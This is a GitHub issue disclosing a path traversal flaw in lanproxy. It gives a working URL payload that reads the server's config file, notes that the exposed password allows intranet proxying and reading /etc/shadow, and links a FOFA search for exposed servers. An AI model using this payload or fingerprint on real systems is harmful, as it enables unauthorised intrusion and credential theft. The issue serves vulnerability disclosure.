Skip to content

Path traversal vulnerability in lanproxy leads to connection to the intranet #1

@maybe-why-not

Description

@maybe-why-not

Vendor of the product: https://github.com/ffay/lanproxy

Payload: http://192.168.5.43:8090/../conf/config.properties
Read configuration file
image

Configure the proxy to connect to the intranet after logging in with the password
image

Read /etc/shadow
image

Fingerprint:
https://fofa.so/result?q=%22Server%3A+LPS-0.1%22&qbase64=IlNlcnZlcjogTFBTLTAuMSI%3D
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions